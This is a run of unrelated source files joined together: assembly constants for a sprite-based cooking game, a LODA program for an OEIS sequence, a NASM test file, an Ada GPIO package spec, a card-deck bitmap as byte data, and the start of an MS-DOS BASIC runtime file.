THEME_W3_FG = $75 THEME_W3_BG = $7E THEME_F0_CHARS = $87 THEME_F0_FG = $90 THEME_F0_BG = $99 THEME_F1_CHARS = $A2 THEME_F1_FG = $AB THEME_F1_BG = $B4 THEME_F2_CHARS = $BD THEME_F2_FG = $C6 THEME_F2_BG = $CF THEME_F3_CHARS = $D8 THEME_F3_FG = $E1 THEME_F3_BG = $EA THEME_SRC_CHAR_COUNT = 24 FRAME_LINE_SIZE = $10 ; Number of bytes for per-line sprite data FL_OBJY = $0001 ; Y position of objects FL_SP4X = $0002 ; Sprite X and Y positions FL_SP5X = $0003 FL_SP6X = $0004 FL_SP7X = $0005 FL_MSIGX = $0006 ; Bit 9 of sprite X positions FL_SPENA = $0007 ; Sprite Enable FL_SP4COL = $0008 ; Sprite colours FL_SP5COL = $0009 FL_SP6COL = $000A FL_SP7COL = $000B FL_SPRPTR4 = $000C ; Sprite 4 pointer FL_SPRPTR5 = $000D ; Sprite 5 pointer FL_SPRPTR6 = $000E ; Sprite 6 pointer FL_SPRPTR7 = $000F ; Sprite 7 pointer FL_END = $0010 SL_WAIT_Y = $0000 SL_OBJY = $0001 ; Y position of objects SL_SP0X = $0002 ; Sprite X and Y positions SL_SP1X = $0003 SL_SP2X = $0004 SL_SP3X = $0005 SL_SP4X = $0006 SL_SP5X = $0007 SL_SP6X = $0008 SL_SP7X = $0009 SL_MSIGX = $000A ; Bit 9 of sprite X positions SL_SP0COL = $000B ; Sprite colours SL_SP1COL = $000C SL_SP2COL = $000D SL_SP3COL = $000E SL_SP4COL = $000F SL_SP5COL = $0010 SL_SP6COL = $0011 SL_SP7COL = $0012 SL_SPRPTR0 = $0013 ; Sprite frame pointers SL_SPRPTR1 = $0014 SL_SPRPTR2 = $0015 SL_SPRPTR3 = $0016 SL_SPRPTR4 = $0017 SL_SPRPTR5 = $0018 SL_SPRPTR6 = $0019 SL_SPRPTR7 = $001A ; Offsets into Player Data in zer o page PL_DIR = $00 ; Direction PL_X_LO = $01 ; X pixel PL_X_HI = $02 PL_Y = $03 ; Y pixel PL_FRAME = $04 ; Frame PL_OBJ = $05 ; Object carried PL_OBJ_VAL = $06 ; Value of carried object PL_MP_LO = $07 ; Screen char position of East foot PL_MP_HI = $08 ; PL_FRAME_COUNT = $09 ; Counter until next frame change PL_BUTTON = $0A ; State of button PL_ACTIVITY = $0B ; Current Activity - none, chop or cook PL_ACT_DIR = $0C ; Direction of Activity stick waggle PL_ACT_INDEX = $0D ; Index of the object we're acting on. PL_MSG = $0E ; Message sprite to display PL_MSG_COUNT = $0F ; Time remaining to show message or $FF to keep it PL_UPDATE_OBJ = $10 ; Index of object to update P_DATA_SIZE = $11 ; Size of player data PLAYER_FRAME_MASK = $3 MAP_WIDTH = 14 ANIM_FREQ = $07 ; Frequency at which to change chef animation frames PLAYER_LINE = 54 ; Line at which to initialize player sprites CHAR_ARROW_N = CHAR_BASE + (8 * CH_SLIDER_N) CHAR_ARROW_S = CHAR_ARROW_N + $8 CHAR_ARROW_E = CHAR_ARROW_S + $8 CHAR_ARROW_W = CHAR_ARROW_E + $8 CHAR_BLOCKER_0 = CHAR_BASE + (8 * CH_BLOCKER_1) CHAR_BLOCKER_1 = CHAR_BLOCKER_0 + $8 CHAR_BLOCKER_2 = CHAR_BLOCKER_1 + $8 CHAR_BLOCKER_3 = CHAR_BLOCKER_2 + $8 CHAR_WALL = CHAR_BASE + (8 * 40) BLOCKER_SEQ_SIZE = 6 LOOK_OFFSET_SIZE = 13 CHOICE_CONTINUE = 0 CHOICE_QUIT = 1 ; Graphics Characters CH_BLANK = $00 CH_FILLED = $01 CH_BLOCKER_1 = $02 CH_BLOCKER_2 = $03 CH_BLOCKER_3 = $04 CH_BLOCKER_4 = $05 CH_SLIDER_N = $06 CH_SLIDER_S = $07 CH_SLIDER_E = $08 CH_SLIDER_W = $09 CH_BOX_TOP_LEFT = $0A CH_BOX_TOP_RIGHT = $0B CH_BOX_BOTTOM_RIGHT = $0C CH_BOX_BOTTOM_LEFT = $0D CH_BOX_TOP = $0E CH_BOX_RIGHT = $0F CH_BOX_BOTTOM = $10 CH_BOX_LEFT = $11 CH_SHAD_N = $12 CH_SHAD_E = $13 CH_SHAD_W = $14 CH_SHAD_S = CH_BOX_BOTTOM CH_SHAD_N_NW_W = $15 CH_SHAD_N_NE_E = $16 CH_SHAD_S_SW_W = $17 CH_SHAD_S_SE_E = $18 CH_SHAD_NW = $19 CH_SHAD_NE = $1A CH_SHAD_SE = $1B CH_SHAD_SW = $1C CH_SHAD_N_NW = $1D CH_SHAD_N_NE = $1E CH_KNIFE = $1F CH_STOVE = $20 CH_SERVE = $21 CH_TOMATO = $22 CH_LETTUCE = $23 CH_PATTY = $24 CH_BUN = $25 CH_PLATE = $26 CH_BIN = $27 CH_THEME_00 = $28 CH_THEME_01 = $29 CH_THEME_02 = $2A CH_THEME_03 = $2B CH_THEME_04 = $2C CH_THEME_05 = $2D CH_THEME_06 = $2E CH_THEME_07 = $2F CH_THEME_08 = $30 CH_THEME_09 = $31 CH_THEME_10 = $32 CH_THEME_11 = $33 CH_THEME_12 = $34 CH_THEME_13 = $35 CH_THEME_14 = $36 CH_THEME_15 = $37 CH_THEME_16 = $38 CH_THEME_17 = $39 CH_THEME_18 = $3A CH_THEME_19 = $3B CH_THEME_20 = $3C CH_THEME_21 = $3D CH_THEME_22 = $3E CH_THEME_23 = $3F SRC_BUSH_00 = $40 SRC_BUSH_01 = $41 SRC_BUSH_02 = $42 SRC_BUSH_03 = $43 SRC_BUSH_04 = $44 SRC_BUSH_05 = $45 SRC_BUSH_06 = $46 SRC_BUSH_07 = $47 SRC_BUSH_08 = $48 SRC_ROCK_00 = $49 SRC_ROCK_01 = $4A SRC_ROCK_02 = $4B SRC_ROCK_03 = $4C SRC_ROCK_04 = $4D SRC_ROCK_05 = $4E SRC_ROCK_06 = $4F SRC_ROCK_07 = $50 SRC_ROCK_08 = $51 SRC_HOLE_00 = $52 SRC_HOLE_01 = $53 SRC_HOLE_02 = $54 SRC_HOLE_03 = $55 SRC_HOLE_04 = $56 SRC_HOLE_05 = $57 SRC_HOLE_06 = $58 SRC_HOLE_07 = $59 SRC_HOLE_08 = $5A SRC_GRASS_00 = $5B SRC_GRASS_01 = $5C SRC_GRASS_02 = $5D SRC_WALL_00 = $5E SRC_WALL_01 = $5F SRC_WALL_02 = $60 SRC_WALL_03 = $61 SRC_WALL_04 = $62 SRC_WALL_05 = $63 SRC_WALL_06 = $64 SRC_WALL_07 = $65 SRC_WALL_08 = $66 SRC_WINDOW_00 = $67 SRC_WINDOW_01 = $68 SRC_WINDOW_02 = $69 SRC_WINDOW_03 = $6A SRC_WINDOW_04 = $6B SRC_WINDOW_05 = $6C SRC_WINDOW_06 = $6D SRC_WINDOW_07 = $6E SRC_WINDOW_08 = $6F SRC_SAND_00 = $70 SRC_SAND_01 = $71 SRC_SAND_02 = $72 SRC_SAND_03 = $73 SRC_SAND_04 = $74 SRC_SAND_05 = $75 SRC_SAND_06 = $76 SRC_SAND_07 = $77 SRC_SAND_08 = $78 SRC_TREE_00 = $79 SRC_TREE_01 = $7A SRC_TREE_02 = $7B SRC_TREE_03 = $7C SRC_TREE_04 = $7D SRC_TREE_05 = $7E SRC_TREE_06 = $7F SRC_TREE_07 = $80 SRC_TREE_08 = $81 SRC_WOOD_00 = $82 SRC_WOOD_01 = $83 SRC_WOOD_02 = $84 SRC_WOOD_03 = $85 SRC_WOOD_04 = $86 SRC_WOOD_05 = $87 SRC_WOOD_06 = $88 SRC_WOOD_07 = $89 SRC_WOOD_08 = $8A SRC_CHECK_00 = $8B SRC_CHECK_01 = $8C SRC_CHECK_02 = $8D SRC_WALL_09 = $8E SRC_WALL_10 = $8F SRC_WALL_11 = $90 SRC_WALL_12 = $91 SRC_WALL_13 = $92 SRC_WALL_14 = $93 SRC_WALL_15 = $94 SRC_WALL_16 = $95 SRC_WALL_17 = $96 SRC_COBBLE_00 = $97 SRC_COBBLE_01 = $98 SRC_COBBLE_02 = $99 SRC_COBBLE_03 = $9A SRC_COBBLE_04 = $9B SRC_COBBLE_05 = $9C SRC_PUDDLE_LG_00 = $9D SRC_PUDDLE_LG_01 = $9E SRC_PUDDLE_SM_00 = $9F SRC_PUDDLE_LG_02 = $A0 SRC_PUDDLE_LG_03 = $A1 SRC_PUDDLE_SM_01 = $A2 SRC_CACTUS_00 = $A3 SRC_CACTUS_01 = $A4 SRC_CACTUS_02 = $A5 SRC_CACTUS_03 = $A6 ; UNUSED = $A7 ; UNUSED = $A8 SRC_SPACE_WINDOW_00 = $A9 SRC_SPACE_WINDOW_01 = $AA SRC_SPACE_WINDOW_02 = $AB SRC_SPACE_WINDOW_03 = $AC SRC_SPACE_WINDOW_04 = $AD SRC_SPACE_WINDOW_05 = $AE SRC_SPACE_WINDOW_06 = $AF SRC_SPACE_WINDOW_07 = $B0 SRC_SPACE_WINDOW_08 = $B1 SRC_SPACE_WALL_00 = $B2 SRC_SPACE_WALL_01 = $B3 SRC_SPACE_WALL_02 = $B4 SRC_SPACE_WALL_03 = $B5 SRC_LINE_00 = $B6 SRC_LINE_01 = $B7 SRC_LINE_02 = $B8 SRC_LINE_03 = $B9 SRC_LINE_04 = $BA SRC_LINE_05 = $BB SRC_LINE_06 = $BC SRC_LINE_07 = $BD SRC_LINE_08 = $BE SRC_LINE_09 = $BF SRC_LINE_10 = $C0
oeis/003/A003954.asm	neoneye/loda-programs	11	246802	<reponame>neoneye/loda-programs<gh_stars>10-100 ; A003954: Expansion of g.f.: (1+x)/(1-11*x). ; 1,12,132,1452,15972,175692,1932612,21258732,233846052,2572306572,28295372292,311249095212,3423740047332,37661140520652,414272545727172,4556998002998892,50126978032987812,551396758362865932,6065364341991525252,66719007761906777772,733909085380974555492,8072999939190720110412,88802999331097921214532,976832992642077133359852,10745162919062848466958372,118196792109691333136542092,1300164713206604664501963012,14301811845272651309521593132,157319930297999164404737524452 mov $1,11 pow $1,$0 sub $1,1 mul $1,12 add $1,10 div $1,11 add $1,1 mov $0,$1
src/test.asm	phiwen96/asm_mac	0	165972	%include "macros.asm" ; %include "platform.asm" global _main section .data message: define_byte "Ahe{jda", 10 length: equ $-message section .bss bufflen equ 2000 buff: resb bufflen section .text %define i preserved (0) %define n preserved (1) ; _loop_end: ; pop n ; pop i _main: mov arg (0), 2 ; call _lol_begin ; cin (buff, bufflen) ; cout (buff, bufflen) ; for (1, _funct) _end: _out "A" out ('\r\n') out ("B\n") out ("C") ; out_prep_data_2 (kuk2, "This is much more interesting than Hello, World!") ; cout (kuk, kuk_len) ; out ("This is much more interesting than Hello, World!") ; cout (message, length) ; out ("hejsan") exit ; _lol: ; cout (buff, strlen) _lol_begin: push i push n mov i, 0 ; loop-index i mov n, arg (0) ; max n _lool: mov rax, preserved (0) inc i cmp i, n jne _lool _lol_end: pop n pop i ret
host/stm32gd-gpio-pin.ads	ekoeppen/STM32_Generic_Ada_Drivers	1	4399	with STM32_SVD; use STM32_SVD; generic Pin : in GPIO_Pin; Port : in out Natural; Mode : in Pin_IO_Modes := Mode_In; Pull_Resistor : in Internal_Pin_Resistors := Floating; Alternate_Function : in GPIO_Alternate_Function := 0; package STM32GD.GPIO.Pin is pragma Preelaborate; procedure Init; procedure Set_Mode (Mode : Pin_IO_Modes); procedure Set_Type (Pin_Type : Pin_Output_Types); function Get_Pull_Resistor return Internal_Pin_Resistors; procedure Set_Pull_Resistor (Pull : Internal_Pin_Resistors); procedure Configure_Alternate_Function (AF : GPIO_Alternate_Function); function Is_Set return Boolean; procedure Set; procedure Clear; procedure Toggle; end STM32GD.GPIO.Pin;
Appl/Art/Decks/GeoDeck/LCClubK.asm	steakknife/pcgeos	504	244167	<filename>Appl/Art/Decks/GeoDeck/LCClubK.asm<gh_stars>100-1000 LCClubK label byte word C_BLACK Bitmap <71,100,BMC_PACKBITS,BMF_4BIT or mask BMT_MASK> db 0x00, 0x1f, 0xfa, 0xff, 0x00, 0xf0 db 0x01, 0xdd, 0xd0, 0xe1, 0x00, 0x01, 0xdd, 0xd0 db 0x00, 0x7f, 0xfa, 0xff, 0x00, 0xfc db 0x01, 0xd0, 0x0f, 0xe1, 0xff, 0x01, 0x00, 0xd0 db 0x00, 0x7f, 0xfa, 0xff, 0x00, 0xfc db 0x00, 0xd0, 0xe0, 0xff, 0x01, 0xf0, 0xd0 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xdf, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0xe4, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0xe4, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0xf0, 0x0f, 0xff, 0x00, 0x0f, 0xe4, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x04, 0x0f, 0xf0, 0x0f, 0xf0, 0x00, 0xe3, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x04, 0x0f, 0xf0, 0x0f, 0x00, 0x0f, 0xf7, 0xff, 0x0a, 0x0f, 0xff, 0xf0, 0xff, 0xff, 0x0f, 0xff, 0xf0, 0xff, 0xff, 0x0f, 0xf8, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x03, 0x0f, 0xf0, 0x00, 0x00, 0xf7, 0xff, 0x0c, 0xfc, 0x0f, 0xf7, 0x0c, 0x0f, 0x70, 0xc0, 0xf7, 0x0c, 0x0f, 0x7f, 0x0c, 0xf7, 0xf9, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x03, 0x0f, 0xf0, 0x00, 0x0f, 0xf6, 0xff, 0x0c, 0x00, 0x77, 0xf0, 0xf7, 0x77, 0x0f, 0x77, 0x70, 0xf7, 0x70, 0x0f, 0xf7, 0x7f, 0xfa, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x02, 0x0f, 0xf0, 0x00, 0xf5, 0xff, 0x0b, 0x0f, 0x07, 0x0e, 0x0f, 0x70, 0xe0, 0xf7, 0x0e, 0x0f, 0x0e, 0x0f, 0x77, 0xf9, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0xf0, 0x00, 0x0f, 0xff, 0xff, 0xf8, 0x00, 0x09, 0x0e, 0xe0, 0xee, 0xe0, 0x0e, 0xee, 0x00, 0xee, 0xe0, 0xee, 0xfd, 0x00, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xf0, 0x00, 0x00, 0xff, 0xff, 0x0f, 0xf9, 0xff, 0x09, 0xf0, 0xe0, 0xee, 0xee, 0x0e, 0xee, 0x0e, 0xee, 0xe0, 0xe0, 0xfd, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xf0, 0x0f, 0x00, 0x0f, 0xff, 0x0f, 0xfe, 0xff, 0x01, 0x00, 0x0f, 0xfe, 0xff, 0x09, 0xf0, 0xce, 0xee, 0xce, 0xee, 0xce, 0xee, 0xce, 0xee, 0xc0, 0xfd, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x0b, 0x0f, 0xf0, 0x0f, 0xf0, 0x00, 0xff, 0x0f, 0xff, 0xff, 0xf0, 0xf0, 0x00, 0xfd, 0xff, 0x00, 0x0c, 0xfa, 0xec, 0x00, 0x0f, 0xfd, 0xff, 0x01, 0x0f, 0x7f, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x0c, 0x0f, 0xf0, 0x0f, 0xff, 0x00, 0x0f, 0x0f, 0xff, 0xff, 0x0f, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0x00, 0x0c, 0xfa, 0xcc, 0x00, 0x0f, 0xfe, 0xff, 0x02, 0xf0, 0xe0, 0x7f, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x08, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0x0f, 0xff, 0xff, 0xfe, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0xf9, 0x00, 0xfd, 0xff, 0x02, 0xf0, 0xe0, 0x77, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x08, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0x0f, 0xff, 0xff, 0xfe, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0x03, 0x0f, 0x0f, 0xff, 0xff, 0xfe, 0x0f, 0x00, 0x00, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x07, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x05, 0x0f, 0xff, 0xff, 0xf0, 0x00, 0x00, 0xfe, 0xff, 0x01, 0xf0, 0xf0, 0xfe, 0xff, 0xfd, 0xf0, 0xfd, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x0a, 0x0f, 0xff, 0x00, 0x0f, 0x00, 0x0f, 0x00, 0x0f, 0xff, 0xf0, 0xf0, 0xfd, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x09, 0x0f, 0xff, 0xf0, 0x00, 0xff, 0xff, 0x0f, 0xf0, 0xf0, 0x00, 0xfe, 0xf0, 0x01, 0x00, 0xff, 0xfe, 0xf0, 0x02, 0x00, 0xf0, 0x00, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x07, 0x0f, 0xff, 0x0f, 0x00, 0x0f, 0xff, 0x0f, 0x0f, 0xfe, 0x00, 0x09, 0x0f, 0x00, 0x00, 0x0f, 0xf0, 0xf0, 0x00, 0xf0, 0x00, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xff, 0x00, 0x00, 0x0f, 0xff, 0x0f, 0xfa, 0x00, 0x06, 0x0f, 0xf0, 0xf0, 0xff, 0xf0, 0xff, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xf0, 0x70, 0x00, 0x70, 0xff, 0x0f, 0xfa, 0x00, 0x06, 0x0f, 0xf0, 0xf0, 0xff, 0x0f, 0xff, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x14, 0x0f, 0x0f, 0x00, 0x0f, 0x00, 0x0f, 0x0f, 0xf0, 0x00, 0x00, 0xf0, 0xf0, 0x00, 0x00, 0xff, 0xf0, 0xf0, 0xff, 0x0f, 0xff, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0x00, 0x0f, 0x0f, 0x0f, 0xff, 0x00, 0x0f, 0xf0, 0xff, 0x00, 0x0f, 0xff, 0xf0, 0xf0, 0xff, 0x00, 0x0f, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0x00, 0x01, 0x0f, 0x0f, 0xfe, 0xff, 0x01, 0x00, 0x0f, 0xfe, 0xff, 0xfe, 0xf0, 0x02, 0xff, 0xf0, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x0b, 0x0f, 0xf0, 0x07, 0x07, 0x00, 0xff, 0x0f, 0xff, 0xff, 0xf0, 0x00, 0x00, 0xfe, 0xff, 0x03, 0xf0, 0xf0, 0x0f, 0x00, 0xfb, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xff, 0xf0, 0x00, 0xff, 0xff, 0x0f, 0xf9, 0xff, 0x01, 0x00, 0xf0, 0xfd, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xff, 0x00, 0x00, 0x0f, 0xff, 0x0f, 0xfa, 0xff, 0x02, 0xf0, 0xff, 0x0f, 0xfc, 0xf0, 0x02, 0x00, 0x0f, 0x00, 0xfe, 0xff, 0x03, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfa, 0xff, 0x01, 0xf0, 0xf0, 0xf7, 0x0f, 0x05, 0xff, 0xff, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfa, 0xff, 0x04, 0xf0, 0xff, 0xf0, 0xf0, 0xfc, 0xfb, 0xf0, 0x06, 0x0f, 0xff, 0xff, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfb, 0xff, 0x00, 0xf0, 0xfe, 0x00, 0x07, 0x0c, 0xcc, 0xcc, 0x00, 0x00, 0x0f, 0x0f, 0xf0, 0xfe, 0xff, 0x03, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x13, 0xf0, 0x00, 0x00, 0x0e, 0xe0, 0x00, 0xcc, 0xc0, 0x00, 0xee, 0x00, 0xf0, 0x0c, 0x00, 0xff, 0xff, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfd, 0xff, 0x14, 0xf0, 0x00, 0x0f, 0x00, 0x00, 0xee, 0x00, 0x0c, 0x00, 0x0e, 0xe0, 0xee, 0x0e, 0x0c, 0xcc, 0x00, 0xff, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfe, 0xff, 0x15, 0xf0, 0x0f, 0xf0, 0x00, 0x0f, 0x00, 0x0e, 0xe0, 0x00, 0x00, 0xee, 0x0e, 0xe0, 0xe0, 0xcc, 0xfc, 0xc0, 0x00, 0x0e, 0xee, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x07, 0x0f, 0xff, 0xff, 0xf0, 0x0f, 0xff, 0x9f, 0xf0, 0xfe, 0x00, 0x0e, 0xee, 0x00, 0x0e, 0xe0, 0xee, 0x0e, 0x0c, 0xcc, 0xcc, 0x0e, 0xee, 0x0e, 0xe7, 0x07, 0x7f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x14, 0x0f, 0xff, 0xff, 0x09, 0xff, 0xf9, 0x99, 0xff, 0x00, 0x0f, 0x0e, 0x0e, 0xe0, 0xee, 0x0e, 0xe0, 0xe0, 0xcc, 0xfc, 0xc0, 0xee, 0xfe, 0x0e, 0x01, 0x07, 0x0f, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x1d, 0x0f, 0xff, 0xf0, 0x99, 0x9f, 0xff, 0x9f, 0xff, 0xf0, 0x00, 0x00, 0xe0, 0xee, 0xe0, 0xee, 0x0e, 0xe0, 0xcc, 0xcc, 0x0e, 0xe0, 0xb0, 0x00, 0xb0, 0x00, 0xb0, 0x7f, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x05, 0x0f, 0xff, 0x00, 0xf9, 0xff, 0xf0, 0xfe, 0xff, 0x01, 0x00, 0x00, 0xfe, 0x0e, 0x06, 0xe0, 0xee, 0x0c, 0xcc, 0xcc, 0x0e, 0xe0, 0xfd, 0xbb, 0x04, 0xb0, 0x77, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x14, 0x0f, 0xf0, 0x00, 0xf0, 0x0f, 0x0e, 0x0f, 0x00, 0xff, 0xf0, 0x00, 0x0e, 0xe0, 0xee, 0x0e, 0xe0, 0x0c, 0xcf, 0xc0, 0xee, 0xee, 0xfd, 0x00, 0x04, 0x07, 0x77, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x1d, 0x0f, 0x0c, 0x00, 0xf0, 0xe0, 0x0e, 0x00, 0xe0, 0xff, 0xff, 0x0f, 0x00, 0xee, 0xe0, 0xee, 0x0e, 0x0c, 0xcc, 0xc0, 0xee, 0xe0, 0x00, 0xff, 0xff, 0xf0, 0x77, 0x7f, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x0a, 0x00, 0xcc, 0x00, 0xff, 0x0e, 0xe0, 0xee, 0x0f, 0xf9, 0xff, 0x00, 0xfe, 0x0e, 0x0b, 0xe0, 0xe0, 0xcc, 0xcc, 0xc0, 0xee, 0x00, 0x0f, 0xf0, 0x00, 0x00, 0x77, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x19, 0x0c, 0xcc, 0x00, 0xff, 0x00, 0x00, 0x07, 0x0f, 0x99, 0x9f, 0xf0, 0x00, 0xe0, 0xee, 0x0e, 0xe0, 0xcc, 0xfc, 0x0e, 0xee, 0x00, 0x0f, 0xf0, 0xff, 0xff, 0x07, 0xfe, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x1d, 0x0c, 0xcc, 0x00, 0xff, 0x00, 0xbb, 0xb0, 0x0f, 0xf9, 0xff, 0xf0, 0x00, 0x0e, 0xe0, 0xee, 0x00, 0xcc, 0xcc, 0x0e, 0xee, 0x00, 0x0f, 0x07, 0x00, 0x00, 0x77, 0x7f, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x1d, 0x0c, 0xcc, 0x00, 0xf7, 0x0b, 0x0b, 0xbb, 0x0f, 0xff, 0xff, 0xf0, 0x0f, 0x00, 0x0e, 0xe0, 0xe0, 0xcc, 0xcc, 0x0e, 0xe0, 0x00, 0x0f, 0x00, 0xff, 0xff, 0x07, 0x7f, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x1e, 0xf0, 0x00, 0xcc, 0x00, 0xf0, 0xb0, 0xbb, 0xbb, 0xb0, 0xff, 0xff, 0x00, 0xf9, 0xf0, 0x0e, 0x0e, 0xe0, 0xc7, 0x00, 0x07, 0xe0, 0x07, 0x0f, 0x07, 0x00, 0x00, 0x77, 0x7f, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x0d, 0x0b, 0xbb, 0x0c, 0x00, 0xf0, 0x0b, 0x0b, 0xbb, 0xb0, 0xff, 0xf0, 0x00, 0xf9, 0xf0, 0xfd, 0x00, 0x0c, 0xb0, 0xb0, 0x00, 0x00, 0x0f, 0x00, 0xff, 0xff, 0x07, 0x7f, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x04, 0x0b, 0xbb, 0x07, 0x00, 0xf0, 0xfd, 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45/runtime/rt/stringfp.asm	minblock/msdos	0	18334	TITLE STRINGFP - Floating Point String Functions PAGE 56,132 ;* ; STRINGFP - Floating Point ST$ functions ; ; Copyright <C> 1986, Microsoft Corporation ; ;Purpose: ; ; BASIC Syntax mapping to included runtime entry points: ; ; ; - STR$ Function - ; ; v$ = 